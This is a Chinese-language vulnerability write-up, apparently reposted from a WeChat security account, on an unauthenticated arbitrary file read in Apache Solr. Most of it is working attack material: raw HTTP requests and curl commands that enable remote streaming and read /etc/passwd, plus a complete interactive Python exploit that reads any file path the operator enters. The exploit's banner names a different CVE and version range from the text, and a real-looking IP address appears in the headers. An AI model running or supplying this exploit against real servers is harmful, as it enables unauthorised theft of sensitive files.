Apache Solr 任意文件读取漏洞 1Day

  • A+
所属分类:安全文章

Apache Solr 任意文件读取漏洞  1Day

:漏洞描述🐑


Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件


二:  漏洞影响🐇


Apache Solr <= 8.8.1


三:  漏洞复现🐋


访问 Solr Admin 管理员页面

Apache Solr 任意文件读取漏洞  1Day

获取core的信息

http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&wt=json


Apache Solr 任意文件读取漏洞  1Day

发送请求

Apache Solr 任意文件读取漏洞  1Day

请求包如下

POST /solr/ckan/config HTTP/1.1Host: xxx.xxx.xxx:8983Content-Length: 99Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://118.31.46.134:8983Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://118.31.46.134:8983/solr/ckan/configAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Connection: close
{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true},"olrkzv64tv":"="}

再进行文件读取

Apache Solr 任意文件读取漏洞  1Day

POST /solr/ckan/debug/dump?param=ContentStreams HTTP/1.1Host: xxx.xxx.xxx.xxx:8983Content-Length: 29Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36Origin: http://118.31.46.134:8983Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://118.31.46.134:8983/solr/ckan/configAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Connection: close
stream.url=file:///etc/passwd

Apache Solr 任意文件读取漏洞  1Day


Curl请求为curl -d '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://xxx.xxx.xxx.xxx:8983/solr/{corename}/config -H 'Content-type:application/json'curl "http://xxx.xxx.xxx.xxx:8983/solr/db/debug/dump?param=ContentStreams" -F "stream.url=file://etc/passwd" 


四:  漏洞POC🦉

POC还是建立在未授权访问的情况下

import requestsimport sysimport randomimport reimport base64import timefrom lxml import etreeimport jsonfrom requests.packages.urllib3.exceptions import InsecureRequestWarning
def title(): print('+------------------------------------------') print('+ 33[34mPOC_Des: http://wiki.peiqi.tech 33[0m') print('+ 33[34mGithub : https://github.com/PeiQi0 33[0m') print('+ 33[34m公众号 : PeiQi文库 33[0m') print('+ 33[34mVersion: Apache Solr < 8.2.0 33[0m') print('+ 33[36m使用格式: python3 CVE-2019-0193.py 33[0m') print('+ 33[36mUrl >>> http://xxx.xxx.xxx.xxx:8983 33[0m') print('+ 33[36mFile >>> 文件名称或目录 33[0m') print('+------------------------------------------')
def POC_1(target_url): core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json" try: response = requests.request("GET", url=core_url, timeout=10) core_name = list(json.loads(response.text)["status"])[0] print("33[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config33[0m") return core_name except: print("33[31m[x] 目标Url漏洞利用失败33[0m") sys.exit(0)
def POC_2(target_url, core_name): vuln_url = target_url + "/solr/" + core_name + "/config" headers = { "Content-type":"application/json" } data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5) print("33[36m[o] 正在准备文件读取...... 33[0m".format(target_url)) if "This" in response.text and response.status_code == 200: print("33[32m[o] 目标 {} 可能存在漏洞 33[0m".format(target_url)) else: print("33[31m[x] 目标 {} 不存在漏洞33[0m".format(target_url)) sys.exit(0)
except Exception as e: print("33[31m[x] 请求失败 33[0m", e)
def POC_3(target_url, core_name, File_name): vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name) headers = { "Content-Type": "application/x-www-form-urlencoded" } data = 'stream.url=file://{}'.format(File_name) try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5) if "No such file or directory" in response.text: print("33[31m[x] 读取{}失败 33[0m".format(File_name)) else: print("33[36m[o] 响应为:n{} 33[0m".format(json.loads(response.text)["streams"][0]["stream"]))

except Exception as e: print("33[31m[x] 请求失败 33[0m", e)
if __name__ == '__main__': title() target_url = str(input("33[35mPlease input Attack UrlnUrl >>> 33[0m")) core_name = POC_1(target_url) POC_2(target_url, core_name) while True: File_name = str(input("33[35mFile >>> 33[0m")) POC_3(target_url, core_name, File_name)

Apache Solr 任意文件读取漏洞  1Day

四:  参考文章🐋

https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ




最后

下面就是文库的公众号啦,更新的文章都会在第一时间推送在公众号

想要加入交流群的师傅公众号点击交流群加我拉你啦~

别忘了Github下载完给个小星星⭐

https://github.com/PeiQi0/PeiQi-WIKI-POC





本文始发于微信公众号(PeiQi文库):Apache Solr 任意文件读取漏洞 1Day

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: